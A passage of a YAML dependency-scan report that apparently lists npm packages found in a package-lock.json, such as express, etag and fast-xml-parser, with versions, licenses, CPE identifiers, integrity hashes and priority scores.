mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2f35769c64d37fb5
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: escape-html 1.0.3'
title: escape-html 1.0.3
description: 'Package discovered: escape-html 1.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 94fc6050cdb348bc
name: escape-html
version: 1.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:escape-html:escape-html:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:escape-html:escape_html:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:escape_html:escape-html:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:escape_html:escape_html:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:escape:escape-html:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:escape:escape_html:1.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/escape-html@1.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz
integrity: sha512-NiSupZ4OeuGwr68lGIeym/ksIZMJodUGOSCZ/FSnTxcrekbvqrgdUxlJOMpijaKZVjAJrWrGs/6Jy8OMuyj9ow==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b31fcb4e8c7ac0d8
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: etag 1.8.1'
title: etag 1.8.1
description: 'Package discovered: etag 1.8.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4ddb33d9fc7b6ece
name: etag
version: 1.8.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:etag:etag:1.8.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/etag@1.8.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/etag/-/etag-1.8.1.tgz
integrity: sha512-aIL5Fx7mawVa300al2BnEE4iNvo1qETxLrPI/o05L7z6go7fCw1J6EQmbK4FmJ2AS7kgVF/KEZWufBfdClMcPg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 643445c96492a454
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: event-target-shim 5.0.1'
title: event-target-shim 5.0.1
description: 'Package discovered: event-target-shim 5.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 419bcd6d1f4e7103
name: event-target-shim
version: 5.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:event-target-shim:event-target-shim:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:event-target-shim:event_target_shim:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:event_target_shim:event-target-shim:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:event_target_shim:event_target_shim:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:event-target:event-target-shim:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:event-target:event_target_shim:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:event_target:event-target-shim:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:event_target:event_target_shim:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:event:event-target-shim:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:event:event_target_shim:5.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/event-target-shim@5.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/event-target-shim/-/event-target-shim-5.0.1.tgz
integrity: sha512-i/2XbnSz/uxRCU6+NdVJgKWDTM427+MqYbkQzD321DuCQJUqOuJKIA0IM2+W2xtYHdKOmZ4dR6fExsd4SXL+WQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: df7be298e5b5835f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: eventemitter3 4.0.7'
title: eventemitter3 4.0.7
description: 'Package discovered: eventemitter3 4.0.7'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2bf11b6ac833063c
name: eventemitter3
version: 4.0.7
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:eventemitter3:eventemitter3:4.0.7:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/eventemitter3@4.0.7
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/eventemitter3/-/eventemitter3-4.0.7.tgz
integrity: sha512-8guHBZCwKnFhYdHr2ysuRWErTwhoN2X8XELRlrRwpmfeY2jjuUN4taQMsULKUVo1K4DvZl+0pgfyoysHxvmvEw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8f3c29afa2938d65
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: events 3.3.0'
title: events 3.3.0
description: 'Package discovered: events 3.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: bca3d6fcf9ecc55d
name: events
version: 3.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:events:events:3.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/events@3.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/events/-/events-3.3.0.tgz
integrity: sha512-mQw+2fkQbALzQ7V0MY0IqdnXNOeTtP4r0lN9z7AAawCXgqea7bDii20AYrIBrFd/Hx0M2Ocz6S111CaFkUcb0Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 42a06b319afe7e6e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: express 4.22.1'
title: express 4.22.1
description: 'Package discovered: express 4.22.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7bcabe4027921ced
name: express
version: 4.22.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:openjsf:express:4.22.1:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/express@4.22.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/express/-/express-4.22.1.tgz
integrity: sha512-F2X8g9P1X7uCPZMA3MVf9wcTqlyNp7IhH5qPCI0izhaOIYXaW9L535tGA3qmjRzpH+bZczqq7hVKxTR4NWnu+g==
dependencies:
accepts: ~1.3.8
array-flatten: 1.1.1
body-parser: ~1.20.3
content-disposition: ~0.5.4
content-type: ~1.0.4
cookie: ~0.7.1
cookie-signature: ~1.0.6
debug: 2.6.9
depd: 2.0.0
encodeurl: ~2.0.0
escape-html: ~1.0.3
etag: ~1.8.1
finalhandler: ~1.3.1
fresh: ~0.5.2
http-errors: ~2.0.0
merge-descriptors: 1.0.3
methods: ~1.1.2
on-finished: ~2.4.1
parseurl: ~1.3.3
path-to-regexp: ~0.1.12
proxy-addr: ~2.0.7
qs: ~6.14.0
range-parser: ~1.2.1
safe-buffer: 5.2.1
send: ~0.19.0
serve-static: ~1.16.2
setprototypeof: 1.2.0
statuses: ~2.0.1
type-is: ~1.6.18
utils-merge: 1.0.1
vary: ~1.1.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ba97090edfd08e19
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: express-rate-limit 8.5.1'
title: express-rate-limit 8.5.1
description: 'Package discovered: express-rate-limit 8.5.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 41f99f3613a4245b
name: express-rate-limit
version: 8.5.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:express-rate-limit:express-rate-limit:8.5.1:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/express-rate-limit@8.5.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/express-rate-limit/-/express-rate-limit-8.5.1.tgz
integrity: sha512-5O6KYmyJEpuPJV5hNTXKbAHWRqrzyu+OI3vUnSd2kXFubIVpG7ezpgxQy76Zo5GQZtrQBg86hF+CM/NX+cioiQ==
dependencies:
ip-address: ^10.2.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f780fc7a8f12c92d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: extend 3.0.2'
title: extend 3.0.2
description: 'Package discovered: extend 3.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c7f94791a09e5a4e
name: extend
version: 3.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:extend_project:extend:3.0.2:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/extend@3.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/extend/-/extend-3.0.2.tgz
integrity: sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9507c5e5a8d55fc3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: farmhash-modern 1.1.0'
title: farmhash-modern 1.1.0
description: 'Package discovered: farmhash-modern 1.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2efb607597053214
name: farmhash-modern
version: 1.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:farmhash-modern:farmhash-modern:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:farmhash-modern:farmhash_modern:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:farmhash_modern:farmhash-modern:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:farmhash_modern:farmhash_modern:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:farmhash:farmhash-modern:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:farmhash:farmhash_modern:1.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/farmhash-modern@1.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/farmhash-modern/-/farmhash-modern-1.1.0.tgz
integrity: sha512-6ypT4XfgqJk/F3Yuv4SX26I3doUjt0GTG4a+JgWxXQpxXzTBq8fPUeGHfcYMMDPHJHm3yPOSjaeBwBGAHWXCdA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7b51b4692c5fdf0a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fast-deep-equal 2.0.1'
title: fast-deep-equal 2.0.1
description: 'Package discovered: fast-deep-equal 2.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 18c3431d6798a7cd
name: fast-deep-equal
version: 2.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:fast-deep-equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast-deep-equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_deep_equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_deep_equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast-deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast-deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast:fast-deep-equal:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast:fast_deep_equal:2.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/fast-deep-equal@2.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-2.0.1.tgz
integrity: sha512-bCK/2Z4zLidyB4ReuIsvALH6w31YfAQDmXMqMx6FyfHqvBxtjC0eRumeSu4Bs3XtXwpyIywtSTrVT99BxY1f9w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: df8671df2c12ad48
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fast-deep-equal 3.1.3'
title: fast-deep-equal 3.1.3
description: 'Package discovered: fast-deep-equal 3.1.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 5dcd27213b9411fd
name: fast-deep-equal
version: 3.1.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:fast-deep-equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast-deep-equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_deep_equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_deep_equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast-deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast-deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast:fast-deep-equal:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast:fast_deep_equal:3.1.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/fast-deep-equal@3.1.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz
integrity: sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f137c47d21c65abc
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fast-equals 5.4.0'
title: fast-equals 5.4.0
description: 'Package discovered: fast-equals 5.4.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: fea7469744f21377
name: fast-equals
version: 5.4.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:fast-equals:fast-equals:5.4.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast-equals:fast_equals:5.4.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_equals:fast-equals:5.4.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_equals:fast_equals:5.4.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast:fast-equals:5.4.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast:fast_equals:5.4.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/fast-equals@5.4.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fast-equals/-/fast-equals-5.4.0.tgz
integrity: sha512-jt2DW/aNFNwke7AUd+Z+e6pz39KO5rzdbbFCg2sGafS4mk13MI7Z8O5z9cADNn5lhGODIgLwug6TZO2ctf7kcw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c3d9f6c04405728e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fast-glob 3.3.3'
title: fast-glob 3.3.3
description: 'Package discovered: fast-glob 3.3.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 756085ffd4026f3c
name: fast-glob
version: 3.3.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:fast-glob:fast-glob:3.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast-glob:fast_glob:3.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_glob:fast-glob:3.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_glob:fast_glob:3.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast:fast-glob:3.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast:fast_glob:3.3.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/fast-glob@3.3.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fast-glob/-/fast-glob-3.3.3.tgz
integrity: sha512-7MptL8U0cqcFdzIzwOTHoilX9x5BrNqye7Z/LuC7kCMRio1EMSyqRK3BEAUD7sXRq4iT4AzTVuZdhgQ2TCvYLg==
dependencies:
'@nodelib/fs.stat': ^2.0.2
'@nodelib/fs.walk': ^1.2.3
glob-parent: ^5.1.2
merge2: ^1.3.0
micromatch: ^4.0.8
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c31f574684b9f10b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fast-xml-builder 1.1.5'
title: fast-xml-builder 1.1.5
description: 'Package discovered: fast-xml-builder 1.1.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b198a6d2f9894f68
name: fast-xml-builder
version: 1.1.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:fast-xml-builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast-xml-builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_xml_builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_xml_builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast-xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast-xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast_xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast:fast-xml-builder:1.1.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fast:fast_xml_builder:1.1.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/fast-xml-builder@1.1.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.5.tgz
integrity: sha512-4TJn/8FKLeslLAH3dnohXqE3QSoxkhvaMzepOIZytwJXZO69Bfz0HBdDHzOTOon6G59Zrk6VQ2bEiv1t61rfkA==
dependencies:
path-expression-matcher: ^1.1.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b4dd20a63e4dfb25
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fast-xml-parser 5.7.2'
title: fast-xml-parser 5.7.2
description: 'Package discovered: fast-xml-parser 5.7.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 03ef00f42507be2f
name: fast-xml-parser
version: 5.7.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:naturalintelligence:fast-xml-parser:5.7.2:*:*:*:*:*:*:*
